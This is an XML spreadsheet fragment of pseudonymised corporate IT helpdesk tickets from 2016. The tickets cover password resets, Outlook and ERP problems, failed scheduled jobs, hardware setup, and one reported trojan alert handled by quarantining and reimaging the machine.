    <s v="from: vwaliogd dviwuzhm _x000a_sent: friday, august 5, 2016 8:07 pm_x000a_to: gdhyrts muggftyali  &lt;tvmuzqio.bhsmdxgz@gmail.com&gt;; sadghryioshkurtyar  hiremath &lt;dcbligso.mfhquljk@gmail.com&gt;_x000a_cc: stefyty parkeyhrt &lt;esntuago.kwxrdhuv@gmail.com&gt;; wyjsbzda yfeuhtib &lt;wyjsbzda.yfeuhtib@gmail.com&gt;_x000a_subject: low disk space on lhqSID_1854 - f drive_x000a__x000a_hi nagfghtyudra / sadghryiosh, _x000a__x000a_i was checking my access to lhqSID_1854 for tomorrow's dot net application deployment and realized f: is running out of space with only 4kb free space. is this ok? if not, request your help to clear off any temporary files to free up some space._x000a_adding stefyty parkeyhrt in cc if you need approvals to move over files between drives if required. _x000a__x000a_ _x000a__x000a_"/>
    <s v="vwaliogd dviwuzhm"/>
    <x v="11"/>
  </r>
  <r>
    <s v="t drive folder access"/>
    <s v="zugriff auf verzeichnis angefragt._x000a_folder access requested._x000a__x000a_benutzer id ?_x000a_user id karagtfma_x000a__x000a_benutzer die position titel?_x000a_user's position title  manager commodities amerirtcas_x000a__x000a_verzeichnis? _x000a_folder //HostName_768   all items under purchasing_x000a__x000a_art des zugriffs?_x000a_type of access ? (read only or full control) full control_x000a__x000a_name des vorgesetzten?_x000a_manager name?"/>
    <s v="vfrdxtqw jfbmsenz"/>
    <x v="33"/>
  </r>
  <r>
    <s v="unable to launch outlook"/>
    <s v="unable to launch outlook"/>
    <s v="wjtzrmqc ikqpbflg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="EU_tool funktioniert nicht."/>
    <s v="EU_tool funktioniert nicht._x000d__x000a_meldung : unbekannten fehler . system distributor_tool fehler."/>
    <s v="cwrikael oanmsecr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="telephony_software &lt; -- &gt;  erp"/>
    <s v="the terms of payment are not in line between crm and erp_x000d__x000a__x000d__x000a_customer 81800540     fredi stury ag                  ruemlang_x000d__x000a__x000d__x000a_sales org. 1278_x000d__x000a_crm-entry: 0008  2% 20 days net 40 days    _x000d__x000a_erp-entry:  0027  2% 14 days net 30 days_x000d__x000a__x000d__x000a_i suggested that both systems should reflect the same data._x000d__x000a__x000d__x000a_according to the information received from repyzajo lxfwopyq it was requested by sales and approved by finance._x000d__x000a_could you please change it back to 0027."/>
    <s v="atlwdyej vtlhzbix"/>
    <x v="14"/>
  </r>
  <r>
    <s v="outlook is not opening."/>
    <s v="outlook is not opening."/>
    <s v="nqdyowsm yqerwtna"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked."/>
    <s v="account locked."/>
    <s v="cwrikael oanmsecr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset request for kiosk users."/>
    <s v="password reset request for kiosk users."/>
    <s v="ughzilfm cfibdamq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="oprbatch extending plant views on fert items with missing/ incorrect settings."/>
    <s v="oprbatch extending plant views on fert items with missing/ incorrect settings.  mm 4994907 extended to plant_322 - missing abc, spt incorrect, and mrptype incorrect.  mm 5276470 extended to plant_341 - missing abc, spt incorrect, mrp type incorrect, delivery plant incorrect for sales org 1320.   mm 6065360 extended  to plant_9  - missing abc, spt incorrect, mrp type incorrect.  in addition, when oprbatch extends, price control is defaulted to v, depending on source it should be s and this always needs corrected manually.  "/>
    <s v="xkmvpaei fizqoprk"/>
    <x v="29"/>
  </r>
  <r>
    <s v="mmaster sales org extensions created by oprbatch are creating errors in matgrp1 and material statistics"/>
    <s v="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_x000d__x000a_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
    <s v="xkmvpaei fizqoprk"/>
    <x v="29"/>
  </r>
  <r>
    <s v="cannot use - net weaver business client 5.0"/>
    <s v="_x000d__x000a__x000d__x000a_received from: uvoyrbhp.qbupdjhw@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a_                   i cannot use net weaver business client 5.0. please support for this issue_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d1f333.8ea429e0]_x000d__x000a_with warm "/>
    <s v="uvoyrbhp qbupdjhw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="device replacement: setup new hp laserjet m575 mfp - replaces old ag65 - tel.: -328"/>
    <s v="device replacement: setup new hp laserjet m575 mfp - replaces old ag65 - tel.: -328"/>
    <s v="dqeowzux cjorxvew"/>
    <x v="28"/>
  </r>
  <r>
    <s v=".netframdntyework 4.6.1 &amp; business_client 5.0 SID_792 deployment across amerirtcas (specific list of pc's) - 11th aug 2016 "/>
    <s v="_x000d__x000a__x000d__x000a_received from: yqlvfkih.folbpugd@gmail.com_x000d__x000a__x000d__x000a_dear folks,_x000d__x000a_we have planned to deploy the dotnetframdntyework 4.6.1 &amp; business_client 5.0 SID_792 on the enclosed list of engineering_tool application installed pc's of amerirtcas region from thursday (11th aug) and also please ensure that all these users (as enclosed) are familiar with the package installation steps (type of package, installation duration, importance of the package, mode of the installation, times of reboot and installation behavior) through referring the below details._x000d__x000a__x000d__x000a_note : this is to deploy only on 73 pc's of amerirtcas that has engineering_tool application installed (identified by engineering_tool application team â€“ prioritized list)_x000d__x000a__x000d__x000a_package details :_x000d__x000a__x000d__x000a__x000d__x000a_deployment date: - aug 11th  2016 - thursday_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_time: - 9.00 am in the morning (as per the respective location time zone)_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_deployment tool: - patching_antivirus_sw_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_package type: - prompted. user will be prompted with prior notification to save all the work before proceeding the installation through clicking the continue button._x000d__x000a__x000d__x000a_duration: - 10 - 15 minutes_x000d__x000a__x000d__x000a_restart required: -  yes (prompt to restart after the installation of netframdntyework 4.6.1 &amp; business_client 5.0 SID_792)_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_package behavior: - please go through the below provided bill bankrd and understand the importance of the package deployment ._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d1f328.7d792db0]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="yqlvfkih folbpugd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="laptop is having blue screen"/>
    <s v="laptop is having blue screen"/>
    <s v="qekdgaim wagshrzl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sent from snipping tool"/>
    <s v="_x000d__x000a__x000d__x000a_received from: afwzehqs.jfbxegac@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_after updating the erp, i am facing problem in oppening the attachments in erp quotes._x000d__x000a__x000d__x000a_please resolve immidiately as this is causing problem for my regular activity._x000d__x000a__x000d__x000a_[cid:image001.png@01d1f32d.b16020c0]_x000d__x000a__x000d__x000a__x000d__x000a_warm "/>
    <s v="afwzehqs jfbxegac"/>
    <x v="0"/>
  </r>
  <r>
    <s v="discounts"/>
    <s v="cannot access discounts through collaboration_platform"/>
    <s v="xioapjvd yiqubxmz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering tool is getting locked out frequently."/>
    <s v="engineering tool is getting locked out frequently."/>
    <s v="ewztnhig boixplft"/>
    <x v="0"/>
  </r>
  <r>
    <s v="holiday list needs rebuilt"/>
    <s v="someone has deleted all of the holiday entries from the holiday list on the hub.  there should be a backup in metavis that can be restored.  please restore the list/"/>
    <s v="sdxjiwlq ynowzqfh"/>
    <x v="15"/>
  </r>
  <r>
    <s v="outlook issue "/>
    <s v="280_x000d__x000a_summary:unable to login to outlook"/>
    <s v="xhjmzyis bsduwrix"/>
    <x v="0"/>
  </r>
  <r>
    <s v="business_client prompts related to java promts"/>
    <s v="please refer attachments to this ticket for more informations."/>
    <s v="tghrloks jbgcvlmf"/>
    <x v="10"/>
  </r>
  <r>
    <s v="erp password reset request."/>
    <s v="erp password reset request."/>
    <s v="hudrkqcg qyhkctrd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="setup new ws \thnsguzj utwijzag"/>
    <s v="setup new ws \thnsguzj utwijzag"/>
    <s v="thnsguzj utwijzag"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws \yucgfmiq jamgpnqe"/>
    <s v="setup new ws \yucgfmiq jamgpnqe"/>
    <s v="yucgfmiq jamgpnqe"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setun new ws \michghytuael luesebrink"/>
    <s v="setun new ws \michghytuael luesebrink"/>
    <s v="wnicojsd evwplcxy"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws \uhammet kuluz"/>
    <s v="setup new ws \uhammet kuluz"/>
    <s v="dkrbwceu aiqkycwp"/>
    <x v="24"/>
  </r>
  <r>
    <s v="install 64 bit version von ms office fÃ¼r pc 215502 im bÃ¼ro rohlings fertigung \njdrcagt shourxyp"/>
    <s v="install 64 bit version von ms office fÃ¼r pc 215502 im bÃ¼ro rohlings fertigung \njdrcagt shourxyp"/>
    <s v="njdrcagt shourxyp"/>
    <x v="24"/>
  </r>
  <r>
    <s v="report  /dscsag/dms_kpro_contv_clean1 is resulting in abap runtime error in SID_1 "/>
    <s v="i tried to run the report /dscsag/dms_kpro_contv_clean1 in SID_1 through background job with the following inputs. but it resulted in abap runtime error shown below._x000d__x000a__x000d__x000a_input variant: ugi_clean_x000d__x000a_application: ugi_x000d__x000a_quantity of inactive content versions: 3_x000d__x000a__x000d__x000a_i have attached the screen shots of the same in the document._x000d__x000a__x000d__x000a_we are working on this ticket :inc1535945 - plm content versions being generated without configuration. this report refers to this ticket."/>
    <s v="pldtreob fznbeusj"/>
    <x v="13"/>
  </r>
  <r>
    <s v="forgot attendance_tool password"/>
    <s v="forgot attendance_tool password"/>
    <s v="teqkxlra vbinmucx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlock suche "/>
    <s v="_x000d__x000a__x000d__x000a_received from: giumxwvh.lfvwjtin@gmail.com_x000d__x000a__x000d__x000a_hallo help-team,_x000d__x000a__x000d__x000a_ich habe das problem, dass wenn ich nach versendeten emails suche Ã¼ber die suche nach namen kommt folgende fehlermeldung._x000d__x000a_es kommen immer nur vorschlÃ¤ge bis zum 03.02.2016_x000d__x000a_bitte prÃ¼fen und rÃ¼ckinfo._x000d__x000a_vielen dank_x000d__x000a_[cid:image002.jpg@01d1f2f7.35b19750]_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen/ kind "/>
    <s v="giumxwvh lfvwjtin"/>
    <x v="28"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_3182"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_3182 at 08/10/16 05:01:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="outlook is not working "/>
    <s v="outlook is not working "/>
    <s v="cthaborg cahbxlmr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset password for erp SID_34 "/>
    <s v="reset password for erp SID_34 "/>
    <s v="xhjmzyis bsduwrix"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_593"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_593 at 08/10/16 04:25:28"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="microsoft outlook2010 is not working for pdujfybc bvfdnale"/>
    <s v="microsoft outlook2010 is not working for pdujfybc bvfdnale. pls. check pc edww8313043._x000d__x000a_"/>
    <s v="vwpxjtof vmidzswj"/>
    <x v="32"/>
  </r>
  <r>
    <s v="visio printer and wireless mouse"/>
    <s v="help to configure the wireless device id04 printer and install the visio 2010 on the reimaged laptop."/>
    <s v="xezjvnyr hmjwknxs"/>
    <x v="18"/>
  </r>
  <r>
    <s v="user called to give information regarding ticket_no0428784"/>
    <s v="user called to give information regarding ticket_no0428784"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="my account changed new password get many error in passwordmanage system ."/>
    <s v="my account changed new password get many error in passwordmanage system . erp system password could not changed . my distributor_tool system -"/>
    <s v="tpoweajk glvztyxp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="business_client issue"/>
    <s v="how do i change the &quot;message server&quot; when connecting to SID_1?_x000d__x000a__x000d__x000a_i believe that it should be lhqx20330"/>
    <s v="ctvaejbo mjcerqwo"/>
    <x v="10"/>
  </r>
  <r>
    <s v="æ–‡ä»¶æ— æ³•æ‰“å°åˆ°æ‰“å°æœºï¼Œæç¤ºæ‰“å°æœºé”™è¯¯ã€‚"/>
    <s v="prtSID_737--æ–‡ä»¶æ— æ³•æ‰“å°åˆ°æ‰“å°æœºï¼Œæç¤ºæ‰“å°æœºé”™è¯¯ã€‚"/>
    <s v="rtjwbuev gfpwdetq"/>
    <x v="31"/>
  </r>
  <r>
    <s v="fund"/>
    <s v="hello ,_x000d__x000a__x000d__x000a_below mail is definitely a spam mail. kindly take note of the same_x000d__x000a__x000d__x000a_also if it is ok than forward this mail to all the employees to warn everyone._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="srqyfjxz lnagtjzi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="new prospect accounts created in crm do not get an erp number "/>
    <s v="hello, _x000d__x000a__x000d__x000a_i have two specific cases where a newly created prospect account in crm (modern construction and sandfield engineering) does not get an erp number, even after some days. after having run an advanced find search i found we have 385 such cases. please see attached file that describes the issue and the unique steps. _x000d__x000a__x000d__x000a_if prospects do not get an erp id it results in the fact that they do not show up in the usersÂ´&quot;my active prospects&quot; view because it filters on prospects with erp id. users think that the account was not created and create the over and over again. we should review if we want to change the logic behind this view - i assume the filter was put in to exlude non-complete accounts. _x000d__x000a__x000d__x000a_another issue i found during this troubleshooting process is i deactivated such a duplicate prospect and the audit log shows that 5 minutes later the account got activated again and got the erp number, too. please investigate this one too. _x000d__x000a__x000d__x000a_"/>
    <s v="ugephfta hrbqkvij"/>
    <x v="39"/>
  </r>
  <r>
    <s v="quotation with configured new simple special items remains incomplete in SID_1"/>
    <s v="quotation with configured new simple special items remains incomplete in SID_1:_x000d__x000a_quotes were created in distributor_tool._x000d__x000a_a) quote 3115968739 /11  - alternate mill_model item gets not replaced with material # of initial item 10._x000d__x000a_b) quote 3115968742 / 10 and 11. pricing remains incomplete. i cannot identify what is actually incomplete. but erp shows the status incomplete and therefore the quote cannot be printed and sent to customer over web."/>
    <s v="iavozegx jpcudyfi"/>
    <x v="12"/>
  </r>
  <r>
    <s v="HostName_587(germany,de-patching_antivirus_sw-production):is inactive since 8/4/2016 5:49 am est "/>
    <s v="germany patching_antivirus_sw server. HostName_587 shows down since  8/8/2016 5:49 am est ._x000d__x000a_kindly check."/>
    <s v="uxgrdjfc kqxdjeov"/>
    <x v="11"/>
  </r>
  <r>
    <s v="HostName_973(hr_tool tax_interface app - qa):average (5 samples) total cpu is now 100.00%, which is above the error threshold (99%)"/>
    <s v="HostName_973(hr_tool tax_interface app - qa) : average (5 samples) total cpu is now 100.00%, which is above the error threshold (99%)"/>
    <s v="uvrbhlnt bjrmalzi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="erp access issue"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):  SID_21_x000a__x000a_enter user id of user having the issue: chopamghy_x000a__x000a_transaction code(s) the user needs or was working with: spro_x000a__x000a_describe the issue: need the access of spro transaction in SID_21_x000a__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000a__x000a_provide access the same as this other user: milyhyakrp"/>
    <s v="akhdmgwt yhgpafqx"/>
    <x v="19"/>
  </r>
  <r>
    <s v="engineering tool"/>
    <s v="das passwort wurde meinerseits falsch eingegeben. bitte passwort zurÃ¼cksetzen (engineering tool und erp). danke_x000d__x000a_"/>
    <s v="gasbfqvp fmvqgjih"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account locked "/>
    <s v="erp SID_34 account locked "/>
    <s v="ngcedtzy pfribotd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="while creating the order in distributor_tool inco and shipping conditions are coming wrong . "/>
    <s v="rabhtui and all,_x000d__x000a__x000d__x000a_it looks like me may still have a web issue.  the folks at the warehouse have seen some instances where the carrier has been a carrier tcode but the inco &amp; sc were cip &amp; 10 so kis is trying to change it to ups ground.  in one case it looks like the inco &amp; sc are pulling from the sold to &amp; the carrier is coming from the ship-to and in another it looks like the customer changed the carrier but was flat rate already because i didn't see that carrier option listed as a default on either the sold to or ship to_x000d__x000a__x000d__x000a_here are the two examples from the warehouse._x000d__x000a__x000d__x000a_delivery  sales order_x000d__x000a_9168970934 35892003 (came over as cip 10 tfedp1nd)  sold-to is cip 10 tupsgrnd, ship-to is fca 04 tfedground w/ acct_x000d__x000a_9168984363 35892687 (came over as cip 10 tfedground)   sold-to is cip 10 tupsgrnd, ship-to is fca 05 tups w/ acct_x000d__x000a__x000d__x000a_"/>
    <s v="qtiyzjaw rxtpbqvu"/>
    <x v="20"/>
  </r>
  <r>
    <s v="erp SID_32 account locked "/>
    <s v="erp SID_32 account locked "/>
    <s v="cgvhxjay znyuopqk"/>
    <x v="19"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: bkbackup_tool_reporting_tool_prod_inc"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: bkbackup_tool_reporting_tool_prod_inc at 08/10/16 00:26:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="enterprise scanner not working "/>
    <s v="enterprise scanner not working "/>
    <s v="fplzydvo fwilgedx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device is temporarily blocked from synchronizing using exchange activesync until your administrator usas it acc"/>
    <s v="from: grhryueg dewicrth _x000d__x000a_sent: wednesday, august 10, 2016 6:22 am_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: rad:fwd: your mobile device is temporarily blocked from synchronizing using exchange activesync until your administrator usas it access._x000d__x000a_importance: high_x000d__x000a__x000d__x000a_can you please unblock and usa access to my new phone?_x000d__x000a__x000d__x000a_"/>
    <s v="kehtxprg uekapfzt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not getting any old mails in my outlook. kindly do the needful to restore the same. and help me store it in separate "/>
    <s v="name:kargthythik_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:hjcpyxtq.okycpbsz@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i am not getting any old mails in my outlook. kindly do the needful to restore the same. and help me store it in separate location"/>
    <s v="hjcpyxtq okycpbsz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to vpn and reset password "/>
    <s v="unable to login to vpn and reset password "/>
    <s v="xiaurwpz hzusljmc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bex password was locked due to wrong typing. please reset the password"/>
    <s v="name:zcqnuawo zxdtskpw_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:zcqnuawo.zxdtskpw@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:bex password was locked due to wrong typing. please reset the password_x000a_"/>
    <s v="zcqnuawo zxdtskpw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="email back problem in outlook"/>
    <s v="_x000d__x000a__x000d__x000a_received from: hjcpyxtq.okycpbsz@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_i am not getting any old mails in my outlook. kindly do the needful to restore the same. and help me store it in separate location_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="hjcpyxtq okycpbsz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pc to be made as stand by own"/>
    <s v="_x000d__x000a__x000d__x000a_received from: kzybxher.prjaswhe@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a__x000d__x000a_pc number awyw8911438 should be made as stand by own it should not be connected to  network, as we are using it for cmm machine it require a separate pc. kindly do the needful._x000d__x000a__x000d__x000a_"/>
    <s v="kzybxher prjaswhe"/>
    <x v="18"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_549"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_549 at 08/09/16 23:10:22"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="cannot open engineering_tool"/>
    <s v="_x000d__x000a__x000d__x000a_received from: anpocezt.qturbxsg@gmail.com_x000d__x000a__x000d__x000a_hello it_x000d__x000a_when i try to open engineering_tool i get this, so i delete engineering_tool off my computer and then reinstalled it and i still get this_x000d__x000a_"/>
    <s v="anpocezt qturbxsg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_37hoti"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_37hoti at 08/09/16 23:03:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_51hotf"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_51hotf at 08/09/16 23:03:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: bk_hana_SID_62_erp_dly_dp"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: bk_hana_SID_62_erp_dly_dp at 08/09/16 23:03:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="bex cannot convert to excel sheet"/>
    <s v="bex cannot convert to excel sheet"/>
    <s v="jgautdmk fpurxzew"/>
    <x v="0"/>
  </r>
  <r>
    <s v="domain account unlock"/>
    <s v="domain account unlock"/>
    <s v="tjlizqgc ngvwoukp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i'm trying to help nkademwy ihsepkwz log into oneteam, to update his direct deposit information"/>
    <s v="_x000d__x000a_ic_x000d__x000a_welcome, our next available agent will be with you shortly..._x000d__x000a_interaction alerting agent._x000d__x000a_website visitor has joined the conversation_x000d__x000a_rakthyesh ramdntythanjesh_x000d__x000a_hello christgry, "/>
    <s v="dmytraiq ixkuqyst"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to view screen on monitor when lid is closed"/>
    <s v="unable to view screen on monitor when lid is closed"/>
    <s v="xpugzdvk xiawvmfp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="å®¢æˆ·æä¾›çš„åœ¨çº¿ç³»ç»Ÿæ‰“ä¸å¼€"/>
    <s v="å®¢æˆ·æä¾›çš„åœ¨çº¿é€è´§å•ç”Ÿæˆç³»ç»Ÿæ‰“ä¸å¼€ï¼Œéœ€å°½å¿«è§£å†³"/>
    <s v="fupikdoa gjkytoeh"/>
    <x v="47"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1320"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1320 at 08/09/16 19:26:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="SID_34/1108/vf01-vf04/ price problems zor agains zf2 inwarehouse_tool"/>
    <s v="we have facing problems with the inwarehouse_tools , the price into the order is correct, but the inwarehouse_tool has another price!!!!_x000d__x000a_example order confirmed 35881790 delivery 9168954879 inwarehouse_tool 0158914039_x000d__x000a_example order confirmed 35882469 delivery 9168955759 inwarehouse_tool 0158915223_x000d__x000a_i must issue the inwarehouse_tools 24 hours after the import payment. in this moment we stopped the process . "/>
    <s v="zvjwleuo tdfqgcal"/>
    <x v="12"/>
  </r>
  <r>
    <s v="cannot load finance_app"/>
    <s v="_x000d__x000a__x000d__x000a_received from: pjxclyhs.fcniljtu@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_each time i select oracle enterprise from my bar, i get the following error:_x000d__x000a__x000d__x000a_[cid:image001.png@01d1f26b.62be0da0]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_kind "/>
    <s v="pjxclyhs fcniljtu"/>
    <x v="54"/>
  </r>
  <r>
    <s v="employment status - employee termination for user: [dbsgicet xzopjhlq - vvgtyhpej]"/>
    <s v="employee last name:  peghyurozich_x000a__x000a_employee first name:  jpsgeghtyui_x000a__x000a_employee number:2111114584_x000a__x000a_employee location: usa_x000a__x000a_manager's name: bwfhtumx japznrvb_x000a__x000a_employee's cost center: bdf001_x000a__x000a_employee self-service (ess) user only?_x000a__x000a_employee's last day of work:8/5/16_x000a__x000a_special instructions:"/>
    <s v="bwfhtumx japznrvb"/>
    <x v="19"/>
  </r>
  <r>
    <s v="reset passwords for nathyuasha smoltelephony_software using password_management_tool password reset."/>
    <s v="globalview (794, prtgghj4k) reset please!!!"/>
    <s v="qctdugsi bfqlgvos"/>
    <x v="16"/>
  </r>
  <r>
    <s v="the snmp agent at '10.32.1.11' is not responding. [infoblox - usa datacenter primary dns]"/>
    <s v="the snmp agent at '10.32.1.11' is not responding. [infoblox - usa datacenter primary dns]"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="55"/>
  </r>
  <r>
    <s v=" Job_1953d:was running longer than 30 minutes kirtyled and rerun to successful completion."/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1953d at 08/09/16 16:52:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="please unlock account  email  in cell phone the users rabkypet zocjdutp (id:fothrmijm) and ltmoubvy utrimobs (gomeshthyru)"/>
    <s v="hello team,_x000a__x000a_could you please unlock account  email  in cell phone the users rabkypet zocjdutp (id:fothrmijm) and ltmoubvy utrimobs (gomeshthyru)_x000a_"/>
    <s v="qasdhyzm yuglsrwx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage: usa pa, plant comcast secondary circuit is down at  4:19 pm et on 09/08."/>
    <s v="what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   __________ 4:19 pm et on 09/08.____________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? __no_____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? __no_____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  _yes_____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ____yes____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ______na_____   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ___na________    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  ______yes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rkupnshb gsmzfojw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="excel continues to crash with 2-3 workbooks open"/>
    <s v="error messages: &quot;excel cannot complete the task with available resources.  choose less data or close other applications.&quot;  also &quot;excel has stopped working&quot;.  and i have beshryued-out areas of my screen or distorted screens that don't refresh the excel view.  no pivot tables or complex macros in use.  only excel with outlook, skype &amp; powerpoint open.  laptop fan runs constantly in dock with excel in use."/>
    <s v="stdezpqw bkmeuhfz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="update dns on printer"/>
    <s v="update dns on printer_x000d__x000a__x000d__x000a_model - hp laser jet 4350dn_x000d__x000a_dynamic ip address - _x000d__x000a_fqdn: prtqi2019_x000d__x000a_short name: SID_99_x000d__x000a_print server: \\HostName_1332"/>
    <s v="mfeyouli ndobtzpw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="as per inc1530176::security incidents - (in33536629) : possible trojan infection - host: 10.44.94.214"/>
    <s v="_x000a_from: gzhapcld fdigznbk _x000a_sent: wednesday, august 10, 2016 1:19 am_x000a_to: jenfrgryui lu_x000a_cc: sam wanrtyg; stefytyn shi; cothyshy wu; qfrntose ivnhumzjalakrisyuhnyrtn; nyrjkctu tbhkenlo; ugyothfz ugrmkdhx; suhtnhdyio psfshytd; kathght shfhyw; bhayhtrathramdnty mamilujli_x000a_subject: inc1530176::security incidents - (in33536629) : possible trojan infection - host: 10.44.94.214_x000a__x000a_hello jenfrgryui,_x000a__x000a_we are getting alerts possible downloader trojan from your 80.68.49.4169(user id: lughjm)  device sourcing from 10.44.94.214 and destined to host 183.91.33.90, indicating that host 10.44.94.214 may be infected with malware._x000a__x000a_due to the nature of this threat, it may be difficult to detect the compromise. because of the detection difficulty and severity of the threat, dell secureworks recommends that we remove the pc off the network at the earliest, format the hard drive and install a new system. it is not reliable to attempt to clean the virus._x000a_ _x000a_ _x000a_in the meantime, as this is a high severity issue we are moving the corresponding account (user id: lughjm) to palo_virus_quarantine group. (no internet access). _x000a_common ways that computers become infected are listed below. please inform our team if you know how your pc may have become infected_x000a_ _x000a_1)     using a portable usb drive (also known as &quot;pen drive&quot; or &quot;thumb drive&quot;)._x000a_2)     clicking a phishing email link._x000a_3)     visiting websites that may have been compromised by a hacker._x000a_ _x000a_ _x000a_ _x000a_hello apac pc services,_x000a_ _x000a_after the pc has been re-imaged with immediate effect. please let us know ._x000a_ _x000a_we have created a ticketing_tool ticket and assigned it to europe pc services.  inc1530176_x000a__x000a__x000a__x000a_"/>
    <s v="gzhapcld fdigznbk"/>
